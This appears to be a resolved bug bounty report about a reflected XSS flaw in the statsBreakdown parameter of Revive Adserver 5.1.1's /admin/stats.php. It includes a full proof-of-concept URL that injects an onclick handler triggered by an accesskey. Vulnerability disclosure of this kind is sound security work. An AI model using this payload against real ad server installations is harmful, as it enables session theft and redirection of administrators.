Loading HuntDB...

Reflected XSS on /admin/stats.php

Medium
R
Revive Adserver
Submitted None
Reported by solov9ev

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Reflected
Linked to the report [https://hackerone.com/reports/1083376](https://hackerone.com/reports/1083376) I found a reflected XSS attack on `/admin/stats.php`. Revive-Adserver version is `revive-adserver-5.1.1`. ### This time I found the parameter `statsBreakdown` - Go to `http://revive-adserver.loc/admin/stats.php?statsBreakdown=day%27%20onclick=alert(document.domain)%20accesskey=X%20&listorder=key&orderdirection=up&day=&setPerPage=15&entity=global&breakdown=history&period_preset=last_month&period_start=01+December+2020&period_end=31+December+2020` - For the payload to be executed, the user needs to press the access key combination for the hidden input field (for Firefox, Alt+Shift+X, see [this](https://developer.mozilla.org/en-US/docs/Web/HTML/Global_attributes/accesskey) for other browsers). {F1186275} ## Impact With this vulnerability, an attacker can for example steal users cookies or redirect users on malicious website.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Reflected